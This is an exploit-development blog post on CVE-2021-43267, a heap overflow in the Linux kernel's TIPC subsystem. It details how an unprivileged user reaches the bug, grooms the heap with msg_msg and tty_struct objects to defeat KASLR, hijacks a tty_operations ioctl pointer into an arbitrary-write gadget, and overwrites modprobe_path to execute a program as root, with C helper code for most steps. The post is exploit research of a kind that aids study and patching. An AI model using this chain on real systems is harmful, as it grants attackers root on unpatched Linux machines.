Exploiting CVE-2021-43267
[+] Introduction
A couple of weeks ago a heap overflow vulnerability in the TIPC subsystem of the Linux kernel was disclosed by Max van Amerongen (@maxpl0it). He posted a detailed write-up about the bug on the SentinelLabs website.
It’s a pretty clear-cut heap buffer overflow where we control the size and data of the overflow. I decided to embark on a small exploit development adventure to see how hard it would be to exploit this bug on a kernel with common mitigations in place (SMEP/SMAP/KASLR/KPTI).
If you came here to find novel kernel exploitation strategies, you picked the wrong blogpost, sorry!
[+] TIPC?
To quote the TIPC webpage:
Have you ever wished you had the convenience of Unix Domain Sockets even when transmitting data between cluster nodes? Where you yourself determine the addresses you want to bind to and use? Where you don’t have to perform DNS lookups and worry about IP addresses? Where you don’t have to start timers to monitor the continuous existence of peer sockets? And yet without the downsides of that socket type, such as the risk of lingering inodes?
Well.. I have not. But then again, I’m just an opportunistic vulndev person.
Welcome to the Transparent Inter Process Communication service, TIPC in short, which gives you all of this, and a lot more.
Thanks for having me.
[+] How to tipc-over-udp?
In order to use the TIPC support provided by the Linux kernel you’ll have to compile a kernel with TIPC enabled, or load the TIPC module which ships with many popular distributions. To easily interface with the TIPC subsystem you can use the tipc utility, which is part of iproute2.
For example, to list all the node links you can issue tipc link list. We want to talk to the TIPC subsystem over UDP, and for that we’ll have to enable the UDP bearer media. This can be done using tipc bearer enable media udp name <NAME> localip <SOMELOCALIP>.
Under the hood the tipc userland utility uses generic netlink messages (addressed to the TIPCv2 generic netlink family) to do its thing. Interestingly enough, these netlink messages can be sent by any unprivileged user. So even if there’s no existing TIPC configuration in place, this bug can still be exploited.
[+] How to reach the vulnerable code path?
Now that we know how to enable the UDP listener for TIPC, how do we go about actually reaching the vulnerable code? We’ll have to present ourselves as a valid node and establish a link before we can trigger the MSG_CRYPTO code path. We can find a protocol specification on the TIPC webpage that details everything about transport, addressing schemes, fragmentation and so on.
That’s a lot of really dry stuff though. I made some PCAPs of a tipc-over-udp session setup and with some hand-waving and reading the kernel source narrowed it down to a few packets we need to emit before we can start sending the messages we are interested in.
In short, a typical TIPC datagram starts with a header that consists of at least six 32-bit words in big-endian byte order. Those are typically referred to as w0 through w5. This header is (optionally) followed by a payload. w0 encodes the TIPC version, header size, payload size and the message ‘protocol’. There’s also a flag which indicates whether this is a sequential message or not.
w1 encodes (among other things) a message type specific to the protocol. The header also specifies a node_id in w3, which is a unique identifier a node includes in every packet. Typically, nodes use their IPv4 address as their node_id.
A quick way to learn about the various bit fields of the header format is by consulting net/tipc/msg.h.
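To make the bit fields a little more concrete, here is a rough sketch of how w0 and the message type in w1 could be packed. The shifts, masks and protocol numbers are how I read net/tipc/msg.h and should be double-checked against the kernel tree you target; the helper names (tipc_w0, tipc_w1_type, put_be32) are made up for this example. Note that, as far as I can tell, the size field in w0 counts the whole message, header included.

```c
#include <stdint.h>

/* Values as read from net/tipc/msg.h (assumption: verify against your tree). */
#define TIPC_VERSION   2
#define LINK_PROTOCOL  7
#define LINK_CONFIG    13
#define MSG_CRYPTO     14

/* w0: version[31:29] | protocol[28:25] | hdr_size/4[24:21] | non_seq[20] | msg_size[16:0] */
uint32_t tipc_w0(uint32_t protocol, uint32_t hdr_size, uint32_t msg_size, uint32_t non_seq)
{
    return ((uint32_t)TIPC_VERSION << 29)
         | ((protocol & 0xf) << 25)
         | (((hdr_size >> 2) & 0xf) << 21)
         | ((non_seq & 1) << 20)
         | (msg_size & 0x1ffff);
}

/* w1: the message type sits in the top three bits; everything else is left zero here. */
uint32_t tipc_w1_type(uint32_t type)
{
    return (type & 0x7) << 29;
}

/* Store a host-order word in big-endian (network) byte order at p. */
void put_be32(uint8_t *p, uint32_t v)
{
    p[0] = (uint8_t)(v >> 24);
    p[1] = (uint8_t)(v >> 16);
    p[2] = (uint8_t)(v >> 8);
    p[3] = (uint8_t)v;
}
```

Building a header then comes down to calling put_be32(buf + 4 * n, wN) for each word before appending the payload.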
To establish a valid node link we send three packets:
protocol: LINK_CONFIG -> message type: DSC_REQ_MSG
protocol: LINK_PROTOCOL -> message type: RESET_MSG
protocol: LINK_PROTOCOL -> message type: STATE_MSG
The LINK_CONFIG packet will advertise ourselves. The link is then reset with the LINK_PROTOCOL packet that has the RESET_MSG message type. Finally, the link is brought up by sending a LINK_PROTOCOL packet with the STATE_MSG message type.
Now we are actually in a state where we can send MSG_CRYPTO TIPC packets and start playing with the heap overflow bug.
[+] Corrupting some memories
A MSG_CRYPTO TIPC packet payload looks like this:
struct tipc_aead_key {
    char alg_name[TIPC_AEAD_ALG_NAME];
    unsigned int keylen;
    char key[];
};
As detailed in the SentinelLabs write-up, the length of the kmalloc’d heap buffer is determined by taking the payload size from the TIPC packet header, after which the key is memcpy’d into this buffer with the length specified in the MSG_CRYPTO structure (keylen). Nothing checks that keylen actually fits in the buffer.
At first you’d think that means the overflow uses uncontrolled data.. but you can send TIPC packets that lie about the actual length of the payload (by making tipc_hdr.payload_size smaller than the actual payload size). This passes all the checks and reaches the memcpy without the remainder of the payload being discarded, giving us full control over the overflowed data. Great!
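The arithmetic behind the overflow can be modelled in a few lines of userland C. This is only a sketch of the size mismatch described above, not kernel code: overflow_bytes is a made-up helper, and the value 32 for TIPC_AEAD_ALG_NAME is what I find in include/uapi/linux/tipc.h.

```c
#include <stddef.h>

#define TIPC_AEAD_ALG_NAME 32   /* value from include/uapi/linux/tipc.h */

/* Offset of key[] inside struct tipc_aead_key: alg_name plus the 32-bit keylen. */
#define KEY_OFFSET (TIPC_AEAD_ALG_NAME + sizeof(unsigned int))

/*
 * Model of the vulnerable receive path: the buffer is allocated with the
 * payload size claimed in the header, then keylen bytes are copied to key[].
 * Returns how many bytes end up past the requested allocation size.
 */
size_t overflow_bytes(size_t claimed_payload_size, size_t keylen)
{
    size_t end_of_copy = KEY_OFFSET + keylen;

    return end_of_copy > claimed_payload_size
         ? end_of_copy - claimed_payload_size
         : 0;
}
```

For example, claiming a 1024 byte payload while sending a keylen of 1036 spills 48 bytes past the buffer. Keep in mind that the slab object may be larger than the requested size, so the part that reaches the neighbouring object is measured from the end of the slab object.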
The payload size taken from the header will be passed to kmalloc directly. Smaller (up to 8KiB) heap objects allocated by the kernel using kmalloc end up in caches that are grouped by size (mostly powers of two). You can have a peep at /proc/slabinfo and look at the entries prefixed by kmalloc- to get an overview of the general purpose object cache sizes.
Since we can control the size of the heap buffer that will be allocated and overflowed, we can pick in which of these caches our object ends up. This is a great ability, as it allows us to overflow into adjacent kernel objects of a similar size!
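Picking a cache boils down to rounding the requested size up to the next cache size. A small sketch of that lookup, assuming the cache sizes of a typical x86_64 SLUB kernel (compare them against the kmalloc-* entries in /proc/slabinfo on your target; kmalloc_cache_size is a name I made up):

```c
#include <stddef.h>

/* General purpose cache sizes on a typical x86_64 SLUB kernel (assumption). */
static const size_t kmalloc_sizes[] = {
    8, 16, 32, 64, 96, 128, 192, 256, 512, 1024, 2048, 4096, 8192
};

/*
 * Return the object size of the cache a kmalloc(n) request would land in,
 * or 0 if the request is too large for these caches.
 */
size_t kmalloc_cache_size(size_t n)
{
    for (size_t i = 0; i < sizeof(kmalloc_sizes) / sizeof(kmalloc_sizes[0]); i++)
        if (n <= kmalloc_sizes[i])
            return kmalloc_sizes[i];
    return 0;
}
```

So a claimed payload size of, say, 1000 bytes puts the key buffer in kmalloc-1024, right next to any other objects of between 513 and 1024 bytes.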
[+] Defeating KASLR
If we want to do any kind of control flow hijacking we’re going to need an information leak to disclose (at least) some kernel text/data addresses so we can deduce the randomized base address.
It would be great if we could find some kernel objects that contain a pointer/offset/length field early on in their structure, and that can be made to return data back to userland somehow.
While googling I stumbled on this cool paper by some Pennsylvania State University students who dubbed objects with such properties “Elastic Objects”. Their research on the subject is quite exhaustive and covers Linux, BSD and XNU.. I definitely recommend checking it out.
Since we can pick arbitrarily sized allocations, we’re free to target any convenient elastic object. I went with msg_msg, which is a popular choice amongst fellow exploitdevs. ;-)
The structure of a msg_msg as defined in include/linux/msg.h:
/* one msg_msg structure for each message */
struct msg_msg {
    struct list_head m_list;
    long m_type;
    size_t m_ts; /* message text size */
    struct msg_msgseg *next;
    void *security;
    /* the actual message follows immediately */
};
You can easily allocate msg_msg objects using the msgsnd system call. And they can be freed again using the msgrcv system call. These system calls are not to be confused with the sendmsg and recvmsg system calls btw, great naming scheme!
If we corrupt the m_ts field of a msg_msg object we can extend its size and get a relative kernel heap out-of-bounds read back to userland when retrieving the message from the queue again using the msgrcv system call.
A small problem with this is that overwriting the m_ts field also requires trampling over the struct list_head members (a prev/next pointer). When msgrcv is called and a matching message is found, it wants to unlink it from the linked list.. but since we’re still in the information leak stage of the exploit, we can’t put any legitimate/meaningful pointers in there. Luckily, there’s a flag you can pass to msgrcv called MSG_COPY, which will make a copy of the message and not unlink the original one, avoiding a bad pointer dereference.
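A minimal sketch of the two msg_msg primitives, assuming x86_64 (where the msg_msg header is 48 bytes) and messages small enough to fit in a single page. The helper names and the msgbuf_big type are made up for this example. MSG_COPY has to be combined with IPC_NOWAIT, interprets the type argument as an index into the queue, and is only available on kernels built with CONFIG_CHECKPOINT_RESTORE.

```c
#define _GNU_SOURCE
#include <stddef.h>
#include <string.h>
#include <sys/types.h>
#include <sys/ipc.h>
#include <sys/msg.h>

#ifndef MSG_COPY
#define MSG_COPY 040000          /* value from the kernel uapi headers */
#endif

#define MSG_MSG_HDR 48           /* sizeof(struct msg_msg) on x86_64 */
#define MAX_TEXT    4048         /* one page minus the header: no msg_msgseg */

struct msgbuf_big {
    long mtype;
    char mtext[MAX_TEXT];
};

/* Text length that makes header + text fill a slab object of cache_size. */
size_t msg_text_len(size_t cache_size)
{
    return cache_size > MSG_MSG_HDR ? cache_size - MSG_MSG_HDR : 0;
}

/* Allocate one msg_msg in the given cache by queueing a message. */
int msg_alloc(int qid, size_t cache_size, int fill)
{
    struct msgbuf_big m;

    m.mtype = 1;
    memset(m.mtext, fill, sizeof(m.mtext));
    return msgsnd(qid, &m, msg_text_len(cache_size), IPC_NOWAIT);
}

/* Copy message number idx out of the queue without unlinking it.
 * maxlen must not exceed sizeof(out->mtext). */
ssize_t msg_peek(int qid, long idx, struct msgbuf_big *out, size_t maxlen)
{
    return msgrcv(qid, out, maxlen, idx, MSG_COPY | IPC_NOWAIT);
}
```

A queue for these helpers can be created with msgget(IPC_PRIVATE, IPC_CREAT | 0600). After m_ts has been corrupted, msg_peek with a maxlen that covers the enlarged size returns the out-of-bounds bytes in mtext.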
So the basic strategy is to line up three objects like this:
msg_msg
msg_msg
some_interesting_object
and proceed to free the first msg_msg object and allocate the MSG_CRYPTO key buffer into the hole it left behind. We corrupt the adjacent msg_msg using the buffer overflow and subsequently leak data from some_interesting_object using the msgrcv system call with the MSG_COPY flag set.
I chose to leak the data of tty_struct, which can easily be allocated by open()’ing /dev/ptmx. This tty_struct holds all kinds of state related to the tty, and starts off like this:
struct tty_struct {
    int magic;
    struct kref kref;
    struct device *dev; /* class device or NULL (e.g. ptys, serdev) */
    struct tty_driver *driver;
    const struct tty_operations *ops;
    int index;
    ...
};
A nice feature of this structure is the magic at the very start: it allows us to easily confirm the validity of our leak by comparing it against the expected value TTY_MAGIC (0x5401). A few members later we find struct tty_operations *ops, which points to a table of function pointers associated with various operations. This table lives somewhere in kernel .data, and thus we can use its address to defeat KASLR!
Depending on whether the tty_struct being leaked belongs to a master pty or slave pty (they are allocated in pairs) we’ll end up finding the address of ptm_unix98_ops or pty_unix98_ops.
As an added bonus, leaking tty_struct also allows us to figure out the address of the tty_struct itself, because the (empty) list head at tty_struct.ldisc_sem.read_wait.next points back at itself!
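Parsing the leaked bytes could look something like the sketch below. It assumes x86_64 and the structure layout shown above (which puts ops at offset 24); find_tty_ops and kernel_base are made-up helper names, and the distance between the ops table and the kernel base is something you would have to look up in the symbol table of the target kernel.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define TTY_MAGIC      0x5401
#define TTY_OPS_OFFSET 24    /* magic(4) + kref(4) + dev(8) + driver(8) */

/*
 * Scan a leaked heap buffer for something that looks like the start of a
 * tty_struct. On success store the ops pointer and return the offset of the
 * candidate inside the leak; return -1 if nothing plausible was found.
 */
long find_tty_ops(const uint8_t *leak, size_t len, uint64_t *ops)
{
    for (size_t off = 0; off + TTY_OPS_OFFSET + 8 <= len; off += 8) {
        uint32_t magic;
        uint64_t candidate;

        memcpy(&magic, leak + off, sizeof(magic));
        memcpy(&candidate, leak + off + TTY_OPS_OFFSET, sizeof(candidate));

        /* kernel image pointers on x86_64 live in the top 2 GiB */
        if (magic == TTY_MAGIC && (candidate >> 31) == 0x1ffffffffULL) {
            *ops = candidate;
            return (long)off;
        }
    }
    return -1;
}

/* Subtract the unslid distance between the leaked symbol and the kernel base. */
uint64_t kernel_base(uint64_t leaked_ops, uint64_t ops_offset_from_base)
{
    return leaked_ops - ops_offset_from_base;
}
```

Which of the two ops tables was leaked has to be decided before calling kernel_base, for example by checking which candidate yields a suitably aligned base address.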
[+] Getting $RIP (or panic tryin’)
Naturally, the tty_operations pointer is a nice target for overwriting to hijack the kernel execution flow. So in the next stage of the exploit we start by spraying a bunch of copies of a fake tty_operations table. We can accurately guesstimate the address of one of these sprayed copies by utilizing the heap pointer we leaked in the previous step.
Now we repeatedly: allocate msg_msg, allocate tty_struct(s), free msg_msg, trigger the TIPC bug to (hopefully) overflow into a tty_struct. To confirm we actually overwrote (the first part of) a tty_struct we invoke ioctl on the fd we got from opening /dev/ptmx; this will call tty_struct.ops->ioctl and should get us control over $RIP if we managed to hijack the ops pointer of this object. If that’s not the case, we close() the pty again to not exhaust resources.
[+] Avoiding ROP (mostly)
Where to jump to in the kernel? We could set up a ROP stack somewhere and pivot the stack into it.. but this can get messy quick, especially once you need to do cleanup and resume the kernel thread like nothing ever happened.
If we look at the prototype of the ioctl callback from the ops list, we see:
int (*ioctl)(struct tty_struct *tty, unsigned int cmd, unsigned long arg);
We can set both cmd and arg from the userland invocation easily! So effectively we have an arbitrary function call where we control the 2nd and 3rd argument (RSI and RDX respectively). Well, cmd is actually truncated to 32bit, but that’s good enough.
Let’s try to look for some gadget sequence that allows us to do an arbitrary write:
$ objdump -D -j .text ./vmlinux \
    | grep -C1 'mov %rsi,(%rdx)' \
    | grep -B2 ret
..
ffffffff812c51f5:  31 c0     xor    %eax,%eax
ffffffff812c51f7:  48 89 32  mov    %rsi,(%rdx)
ffffffff812c51fa:  c3        ret
..
This one is convenient: it also clears rax, so the ioctl returns 0 and the exploit can tell whether the invocation was a success. We now have some arbitrary 64bit write gadget! (For some definition of arbitrary, the value is always 32bit controlled + 32bit zeroes, but whatever)
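The “32bit controlled + 32bit zeroes” limitation is easy to work around when writing a string: advance four bytes at a time and let every store overwrite the zeroes left by the previous one. A userland sketch of that chunking, with the gadget abstracted behind a callback (in the exploit the callback would boil down to ioctl(fd, value, addr) on the hijacked pty; write64_fn, write_string and fake_gadget are names I made up):

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* One invocation of the gadget: store the zero-extended 32-bit value at addr. */
typedef int (*write64_fn)(void *ctx, uint64_t addr, uint32_t value);

/*
 * Write a NUL-terminated string using overlapping 8-byte stores that advance
 * 4 bytes at a time. Each store clobbers the 4 bytes after its chunk with
 * zeroes, which the next store overwrites; the last one leaves the terminator.
 */
int write_string(write64_fn w, void *ctx, uint64_t addr, const char *s)
{
    size_t len = strlen(s) + 1;               /* include the NUL */

    for (size_t off = 0; off < len; off += 4) {
        uint32_t chunk = 0;
        size_t n = len - off < 4 ? len - off : 4;

        memcpy(&chunk, s + off, n);           /* little-endian host assumed */
        if (w(ctx, addr + off, chunk) != 0)
            return -1;
    }
    return 0;
}

/* Userland stand-in for the gadget: ctx is a byte buffer that plays the role
 * of kernel memory starting at address 0. */
int fake_gadget(void *ctx, uint64_t addr, uint32_t value)
{
    uint64_t v = value;                       /* upper 32 bits are zero */

    memcpy((uint8_t *)ctx + addr, &v, sizeof(v));
    return 0;
}
```

Note that the final store zeroes a few bytes past the end of the string, so whatever follows the destination should be able to tolerate that.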
[+] Meet my friend: modprobe_path
Okay, we have this scuffed arbitrary write gadget we can repeatedly invoke, what do we overwrite? Classic kernel exploits would target the cred structure of the current task to elevate the privileges to uid0. We could of course build an arbitrary read mechanism in the same way we built the arbitrary write.. but let’s try something else.
There are various scenarios in which the kernel will spawn a userland process (using the usermode_helper infrastructure in the kernel) to load additional kernel modules when it thinks that is necessary. The process spawned to load these modules is, of course: modprobe. The path to the modprobe binary is stored in a global variable called modprobe_path and this can be set by a privileged user through the sysctl node /proc/sys/kernel/modprobe.
This is a perfect candidate for overwriting using our write gadget. If we overwrite this path and convince the kernel we need some additional module support we can invoke any executable as root!
One of these modprobe scenarios is when you try to run a binary that has no known magic. In fs/exec.c we see:
/*
 * cycle the list of binary formats handler, until one recognizes the image
 */
static int search_binary_handler(struct linux_binprm *bprm)
{
    ..
    if (request_module("binfmt-%04x", *(ushort *)(bprm->buf + 2)) < 0)
    ..
}
request_module ends up invoking call_modprobe, which spawns a modprobe process based on the path from modprobe_path.
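Triggering that code path from userland only takes an executable file that no binary format handler recognizes. A minimal sketch, assuming modprobe_path has already been pointed at a program of our choosing (both helper names are made up, and the four 0xff bytes are just one choice of non-printable, unknown magic):

```c
#include <fcntl.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Create an executable file whose first bytes match no binary format. */
int make_unknown_binary(const char *path)
{
    static const unsigned char junk[4] = { 0xff, 0xff, 0xff, 0xff };
    int fd = open(path, O_WRONLY | O_CREAT | O_TRUNC, 0755);

    if (fd < 0)
        return -1;
    if (write(fd, junk, sizeof(junk)) != (ssize_t)sizeof(junk)) {
        close(fd);
        return -1;
    }
    close(fd);
    return chmod(path, 0755);       /* make sure umask did not strip +x */
}

/*
 * Try to execute the file in a child process. The exec itself is expected to
 * fail; the side effect (the kernel running whatever modprobe_path names) is
 * what matters.
 */
int trigger_modprobe(const char *path)
{
    pid_t pid = fork();

    if (pid < 0)
        return -1;
    if (pid == 0) {
        char *const argv[] = { (char *)path, NULL };

        execv(path, argv);
        _exit(0);
    }
    return waitpid(pid, NULL, 0) == pid ? 0 : -1;
}
```

Calling make_unknown_binary followed by trigger_modprobe on the same path is enough to make the kernel go looking for a binfmt module.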
[+] Closing Words
I hope you enjoyed the read. Feel free to reach out to point out any inaccuracies or to share feedback. The full exploit code can be found here.
A successful run of the exploit should look something like this: